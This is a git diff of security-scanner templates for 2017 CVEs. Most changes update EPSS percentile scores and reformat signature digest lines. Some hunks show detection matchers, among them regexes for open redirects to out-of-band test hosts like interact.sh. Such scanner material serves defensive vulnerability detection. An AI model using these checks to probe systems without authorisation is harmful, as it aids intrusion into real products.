4a0a00473045022100b02033c64790774895e3b116d58db73f7c4595b7a67d0de0faab83b80fe745f502201884a6d79fd1221df6ad9e0c20814bf0770cf75eb9b1cac390d50ea10594faf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b02033c64790774895e3b116d58db73f7c4595b7a67d0de0faab83b80fe745f502201884a6d79fd1221df6ad9e0c20814bf0770cf75eb9b1cac390d50ea10594faf6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index f497b466af..92054fd8d9 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-1000163 cwe-id: CWE-601 epss-score: 0.00154 - epss-percentile: 0.51691 + epss-percentile: 0.51672 cpe: cpe:2.3:a:phoenixframework:phoenix:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -35,4 +35,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' -# digest: 490a0046304402204155af9f3e6fdf224d31445c396439ba5d2832cb3bf20e818ada9cf85139633b022037761bec9b4fe575f5edc20a8fa8f9af54e87bb72d0e72e4a4847742e4c48db8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204155af9f3e6fdf224d31445c396439ba5d2832cb3bf20e818ada9cf85139633b022037761bec9b4fe575f5edc20a8fa8f9af54e87bb72d0e72e4a4847742e4c48db8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index 2f248a948b..f27f663c17 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-1000170 cwe-id: CWE-22 epss-score: 0.70305 - epss-percentile: 0.97697 + epss-percentile: 0.97702 cpe: cpe:2.3:a:jqueryfiletree_project:jqueryfiletree:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index 9a309d58d3..c51560d33d 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-1000486 cwe-id: CWE-326 epss-score: 0.96847 - epss-percentile: 0.99614 + epss-percentile: 0.99616 cpe: cpe:2.3:a:primetek:primefaces:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index bd6dbcfb24..94d7977615 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -18,7 +18,7 @@ info: cvss-score: 8.2 cve-id: CVE-2017-10075 epss-score: 0.00451 - epss-percentile: 0.7232 + epss-percentile: 0.72312 cpe: cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index 1b99d9f40b..b39513ae4c 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-10974 cwe-id: CWE-22 epss-score: 0.96161 - epss-percentile: 0.99361 + epss-percentile: 0.99363 cpe: cpe:2.3:a:yaws:yaws:1.91:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b6233cb908299808937a1ee4741113d9e39f8e4717ad646ac3c61b91351c65550220023179ceaeab032d4825f6a7f214645550eb3f585a412e02c3facced9d89a472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b6233cb908299808937a1ee4741113d9e39f8e4717ad646ac3c61b91351c65550220023179ceaeab032d4825f6a7f214645550eb3f585a412e02c3facced9d89a472:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index b12666d8ed..220486fa07 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-11165 cwe-id: CWE-200 epss-score: 0.94336 - epss-percentile: 0.98994 + epss-percentile: 0.98997 cpe: cpe:2.3:o:datataker:dt80_dex_firmware:1.50.012:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index 36f0801611..4a05d54e72 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-11444 cwe-id: CWE-89 epss-score: 0.018 - epss-percentile: 0.86749 + epss-percentile: 0.86752 cpe: cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-11586.yaml b/http/cves/2017/CVE-2017-11586.yaml index 304cd9b53f..45c01a627a 100644 --- a/http/cves/2017/CVE-2017-11586.yaml +++ b/http/cves/2017/CVE-2017-11586.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-11586 cwe-id: CWE-601 epss-score: 0.00121 - epss-percentile: 0.46185 + epss-percentile: 0.46157 cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: verified: true @@ -43,4 +43,5 @@ http: part: header regex: - 'Refresh:(.*)url=http:\/\/interact\.sh' -# digest: 4a0a004730450220775959fe47ac6b9a5294749afb45919c3246adbe5d40974dcd16a9f0136f8801022100c8e983b7b8210ffec89ddce5d0e35cc46458e89dc05e06687b1704e5bde7df39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220775959fe47ac6b9a5294749afb45919c3246adbe5d40974dcd16a9f0136f8801022100c8e983b7b8210ffec89ddce5d0e35cc46458e89dc05e06687b1704e5bde7df39:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index a6d220698d..643ec9a69a 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-11610 cwe-id: CWE-276 epss-score: 0.97445 - epss-percentile: 0.99942 + epss-percentile: 0.99943 cpe: cpe:2.3:a:supervisord:supervisor:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index 26c9e35182..9a6fc3d565 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-11629 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.41063 + epss-percentile: 0.41016 cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: verified: true @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100faa80afb9c8b1ffa3bcce5fdf6b07e98a04c291786c6fe5b9d2688bcef35a04a02203aad2cea80636c2af6c02e0a5111346906faeab8d6048b02ecb31eec4070c252:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100faa80afb9c8b1ffa3bcce5fdf6b07e98a04c291786c6fe5b9d2688bcef35a04a02203aad2cea80636c2af6c02e0a5111346906faeab8d6048b02ecb31eec4070c252:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index ae0299cdc2..898937dfe3 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-12138 cwe-id: CWE-601 epss-score: 0.00062 - epss-percentile: 0.24795 + epss-percentile: 0.24763 cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:* metadata: max-request: 2 @@ -42,4 +42,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502201e2faf1a6caddcf82238afe4a859d959aaf038d8cdb2dcf5a2a2c5d0612b4e1b02210089021b7475af6e2dd04fe5d095e9d5be590770018b2854e4ebf0fa1ebbb61e22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201e2faf1a6caddcf82238afe4a859d959aaf038d8cdb2dcf5a2a2c5d0612b4e1b02210089021b7475af6e2dd04fe5d095e9d5be590770018b2854e4ebf0fa1ebbb61e22:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml index 903f4710e1..a5e63d9624 100644 --- a/http/cves/2017/CVE-2017-12542.yaml +++ b/http/cves/2017/CVE-2017-12542.yaml @@ -18,7 +18,7 @@ info: cvss-score: 10 cve-id: CVE-2017-12542 epss-score: 0.97377 - epss-percentile: 0.99891 + epss-percentile: 0.9989 cpe: cpe:2.3:o:hp:integrated_lights-out_4_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index 8d6afd8fc3..7e592253e6 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-12544 cwe-id: CWE-79 epss-score: 0.96723 - epss-percentile: 0.99566 + epss-percentile: 0.99569 cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index 40b9fa5699..0f94be45c5 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2017-12583 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.41063 + epss-percentile: 0.41016 cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e47cd0e9c36cd0b172d5aef5844de4b5648f3230baa50d3d9a98479d9e6be7e2022024487c7696fb70ee9babf691c688fc030e97addfdec785ceabed494819422f84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e47cd0e9c36cd0b172d5aef5844de4b5648f3230baa50d3d9a98479d9e6be7e2022024487c7696fb70ee9babf691c688fc030e97addfdec785ceabed494819422f84:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 6c0e5c91c1..2612250b6e 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-12615 cwe-id: CWE-434 epss-score: 0.96923 - epss-percentile: 0.99647 + epss-percentile: 0.9965 cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index fb94f205a4..c691859881 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-12637 cwe-id: CWE-22 epss-score: 0.00648 - epss-percentile: 0.77027 + epss-percentile: 0.7701 cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d2d2db375c00604220b055adf4ec364ae3b5639038aa719c4930a825a82c6007022100c12ea6e43e07410ed52b7a5ed6020f1986b77f6949742a1ce21fb12c8abea756:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d2d2db375c00604220b055adf4ec364ae3b5639038aa719c4930a825a82c6007022100c12ea6e43e07410ed52b7a5ed6020f1986b77f6949742a1ce21fb12c8abea756:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 3002c5db05..7dd28882b6 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-12794 cwe-id: CWE-79 epss-score: 0.00219 - epss-percentile: 0.59774 + epss-percentile: 0.59752 cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ea44f29a42e3c7d5174df6d80da3763d594edb933d56312c5f771f98fa9c24030220444b54f4faef216b91ab4753ac850a2e794ad7d0c39a533e266cf3633cee2412:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ea44f29a42e3c7d5174df6d80da3763d594edb933d56312c5f771f98fa9c24030220444b54f4faef216b91ab4753ac850a2e794ad7d0c39a533e266cf3633cee2412:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index 0f8c76626c..f585a9ebcf 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-14135 cwe-id: CWE-78 epss-score: 0.96679 - epss-percentile: 0.99545 + epss-percentile: 0.99548 cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index 5845766e6a..6942791cd2 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-14524 cwe-id: CWE-601 epss-score: 0.00258 - epss-percentile: 0.63414 + epss-percentile: 0.63405 cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' -# digest: 4b0a00483046022100f558f1c8aa21328f0a261f0bb5d63f61d4d8da7434789a178ff774a2c480636a022100a182ba7decbe8adecf04904561630107e8a78df12038622a076fdbc346d23473:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f558f1c8aa21328f0a261f0bb5d63f61d4d8da7434789a178ff774a2c480636a022100a182ba7decbe8adecf04904561630107e8a78df12038622a076fdbc346d23473:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index bb09a9550f..b7938de81e 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-14535 cwe-id: CWE-78 epss-score: 0.04456 - epss-percentile: 0.91525 + epss-percentile: 0.91511 cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f74f19416abfe3fb5857bd8ac8492bce22d45d7040cc611c3e044fdbe731fbab022100c9d9e98d2650520412fdc7b37a655f6da6bdbf8919bd5d908764522d0262598b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f74f19416abfe3fb5857bd8ac8492bce22d45d7040cc611c3e044fdbe731fbab022100c9d9e98d2650520412fdc7b37a655f6da6bdbf8919bd5d908764522d0262598b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml index 988bc9c188..9ba76d28f8 100644 --- a/http/cves/2017/CVE-2017-14537.yaml +++ b/http/cves/2017/CVE-2017-14537.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-14537 cwe-id: CWE-22 epss-score: 0.01002 - epss-percentile: 0.81955 + epss-percentile: 0.81934 cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 2 @@ -56,4 +56,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200cc8c7f8e956028836a3560e33ecbed21b2defaf867d9e4f7a67be18c8784a0802210087034f4ebc66d069b85b5b003051cc1bf1755c0826d3907486314ed295734098:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200cc8c7f8e956028836a3560e33ecbed21b2defaf867d9e4f7a67be18c8784a0802210087034f4ebc66d069b85b5b003051cc1bf1755c0826d3907486314ed295734098:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index 4396bfb40a..2a291b1a0f 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-14622 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48589 + epss-percentile: 0.48561 cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -50,4 +50,5 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "2kb-amazon-affiliates-store")' condition: and -# digest: 4b0a00483046022100900f8fcbe946fbeeb9685792ca5eb5853b4568f66c15baedb39f171db005585a0221008126b162d51e60d59ff295080dedee8d90a38314362c14b0cd77b58563c4f878:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100900f8fcbe946fbeeb9685792ca5eb5853b4568f66c15baedb39f171db005585a0221008126b162d51e60d59ff295080dedee8d90a38314362c14b0cd77b58563c4f878:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index 53623f9f0c..e1316f3820 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-14651 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50151 + epss-percentile: 0.50126 cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: part: header words: - "text/html" -# digest: 4a0a00473045022100e14646539ad96db83e2deccc854651034558e6c1ea36ebfef460202b2e93edc102204ec71c42e3716498134fdcc3a5294cf79d3eb5f8687c65db6ce3c6992d70e7f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e14646539ad96db83e2deccc854651034558e6c1ea36ebfef460202b2e93edc102204ec71c42e3716498134fdcc3a5294cf79d3eb5f8687c65db6ce3c6992d70e7f8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index f87813248f..f2d318b8df 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-14849 cwe-id: CWE-22 epss-score: 0.96684 - epss-percentile: 0.99547 + epss-percentile: 0.9955 cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 84b4df3084..85e0bf69e0 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-15287 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.47453 + epss-percentile: 0.47438 cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: word words: - 'Unknown command: ' -# digest: 490a00463044022014f31a0741cfd88342ad8e1c4207dcb5bcf27dc0c60629bcfd37a3b50cbde49702205fede34d3cdab35d08a8e76ca6ef037b52cf8e2fea7350cba8fcb2be0d5f4e33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022014f31a0741cfd88342ad8e1c4207dcb5bcf27dc0c60629bcfd37a3b50cbde49702205fede34d3cdab35d08a8e76ca6ef037b52cf8e2fea7350cba8fcb2be0d5f4e33:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index f2573aeef4..f4a1b98c89 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-15363 cwe-id: CWE-22 epss-score: 0.04393 - epss-percentile: 0.91463 + epss-percentile: 0.91452 cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:typo3:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index 2ece39a489..de5215cdae 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-15647 cwe-id: CWE-22 epss-score: 0.02013 - epss-percentile: 0.8762 + epss-percentile: 0.87618 cpe: cpe:2.3:o:fiberhome:routerfiberhome_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ca293105367740143ed1a437021ce0fd4c629bec8f3db23b9a437030ca3e58ab022057a6e6270c6cc38b8cbfaf91d7ab78eabd384744fec45ea62997b0449b841409:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ca293105367740143ed1a437021ce0fd4c629bec8f3db23b9a437030ca3e58ab022057a6e6270c6cc38b8cbfaf91d7ab78eabd384744fec45ea62997b0449b841409:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index 41fc1c8641..68b4a19f7d 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-15715 cwe-id: CWE-20 epss-score: 0.96443 - epss-percentile: 0.99455 + epss-percentile: 0.99456 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -54,4 +54,5 @@ http: - type: dsl dsl: - 'contains(body_2, "{{randstr_1}}")' -# digest: 4a0a00473045022041c56573a856279ceb1618d23461476dfbfcab79e6e189f3a67c4d44361f6a1d0221008f6df55cc60b20e1e430ba8c60cc54849edaa1bf2a85837d436cdb293d3333dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022041c56573a856279ceb1618d23461476dfbfcab79e6e189f3a67c4d44361f6a1d0221008f6df55cc60b20e1e430ba8c60cc54849edaa1bf2a85837d436cdb293d3333dd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index 2324cc449c..ad29513bf1 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2017-15944 epss-score: 0.97344 - epss-percentile: 0.9987 + epss-percentile: 0.99871 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index 26a2d375c3..5db13d312b 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-16806 cwe-id: CWE-22 epss-score: 0.07105 - epss-percentile: 0.93292 + epss-percentile: 0.93289 cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index e507479f55..913459cac2 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-16877 cwe-id: CWE-22 epss-score: 0.0032 - epss-percentile: 0.67307 + epss-percentile: 0.67305 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207ca86195e5608b9c06b4c8235e695ff1d0abbc4efc7efbcb5974fa9cb0315ace022100e72056fe45e487809d6f928c2765d412582614b7205f57844ae12abfe7cd65be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207ca86195e5608b9c06b4c8235e695ff1d0abbc4efc7efbcb5974fa9cb0315ace022100e72056fe45e487809d6f928c2765d412582614b7205f57844ae12abfe7cd65be:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index 902243ba86..faa322ccbf 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-16894 cwe-id: CWE-200 epss-score: 0.11608 - epss-percentile: 0.94711 + epss-percentile: 0.94708 cpe: cpe:2.3:a:laravel:laravel:*:*:*:*:*:*:*:* metadata: verified: true @@ -54,4 +54,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009e2026fdfa594b03c973e0e00cda50678b145e227ef0ed6e41bdb0937f624ce602201b5dfc09fc739fd115867f0a55ffdbd647cbea65577eef9601cfe08be89ca51a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009e2026fdfa594b03c973e0e00cda50678b145e227ef0ed6e41bdb0937f624ce602201b5dfc09fc739fd115867f0a55ffdbd647cbea65577eef9601cfe08be89ca51a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index e167d40795..9b98e90fef 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-17043 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.62406 + epss-percentile: 0.62395 cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a6358a6d1ae197d709ba6f7da578f09cc784f220200600cf2beb312508e4f66b022100938ffef9ae6d4eaf2dcebd89ce15a1d1300a5e66828c9b083e9ffeb582cddd54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a6358a6d1ae197d709ba6f7da578f09cc784f220200600cf2beb312508e4f66b022100938ffef9ae6d4eaf2dcebd89ce15a1d1300a5e66828c9b083e9ffeb582cddd54:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index c10064ed0b..5b11c873c0 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-17059 cwe-id: CWE-79 epss-score: 0.00261 - epss-percentile: 0.63713 + epss-percentile: 0.6371 cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220534ef316db1f1c96035d65126517523362d216eb220b40df0569923b86613363022100c32fe95ced4bc0018f609b9a39bfaebf82b501ac0f5d76ce8be2e9592d929bd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220534ef316db1f1c96035d65126517523362d216eb220b40df0569923b86613363022100c32fe95ced4bc0018f609b9a39bfaebf82b501ac0f5d76ce8be2e9592d929bd7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 2ff9a3e984..e472a76d55 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ 